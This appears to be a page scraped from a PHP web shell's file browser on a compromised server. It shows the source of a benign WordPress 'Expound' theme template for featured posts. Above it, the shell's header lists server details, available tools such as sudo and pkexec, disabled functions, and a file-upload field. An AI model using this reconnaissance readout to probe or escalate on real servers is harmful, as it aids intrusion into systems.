| Server IP : 104.21.21.239 / Your IP : 216.73.216.37 Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5 System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64 User : ec2-user ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/tgnew/wp-content/themes/expound/ |
Upload File : |
<?php /** * @package Expound */ $featured_posts = expound_get_featured_posts(); ?> <?php if ( $featured_posts->have_posts() ) : $featured_posts->the_post(); ?> <div class="featured-content"> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <?php if ( has_post_thumbnail() ) : ?> <div class="entry-thumbnail"> <a href="<?php the_permalink(); ?>"><?php the_post_thumbnail( 'expound-featured' ); ?></a> </div> <?php endif; ?> <header class="entry-header"> <h1 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php echo esc_attr( sprintf( __( 'Permalink to %s', 'expound' ), the_title_attribute( 'echo=0' ) ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h1> </header><!-- .entry-header --> <div class="entry-summary"> <?php the_excerpt(); ?> <p><a class="button-primary" href="<?php the_permalink(); ?>"><?php _e( 'Continue reading →', 'expound' ); ?></a></p> </div><!-- .entry-summary --> <div class="clear"></div> </article> </div><!-- .featured-content --> <?php if ( $featured_posts->have_posts() ) : // more than one? ?> <div class="featured-content-secondary"> <?php while ( $featured_posts->have_posts() ) : $featured_posts->the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <?php if ( has_post_thumbnail() ) : ?> <div class="entry-thumbnail"> <a href="<?php the_permalink(); ?>"><?php the_post_thumbnail(); ?></a> <?php if ( get_the_category() ) : ?> <span class="entry-thumbnail-category"><?php the_category( ' / ' ); ?></span> <?php endif; // get_the_category() ?> </div> <?php endif; ?> <header class="entry-header"> <h1 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php echo esc_attr( sprintf( __( 'Permalink to %s', 'expound' ), the_title_attribute( 'echo=0' ) ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h1> </header><!-- .entry-header --> <div class="entry-summary"> <?php the_excerpt(); ?> </div><!-- .entry-summary --> </article> <?php if ( $featured_posts->current_post % 4 == 0 ) : ?> <div class="clear"></div> <?php endif; // % 4 ?> <?php endwhile; ?> </div><!-- .featured-content-secondary --> <?php endif; // have_posts() inner ?> <?php endif; // have_posts() ?>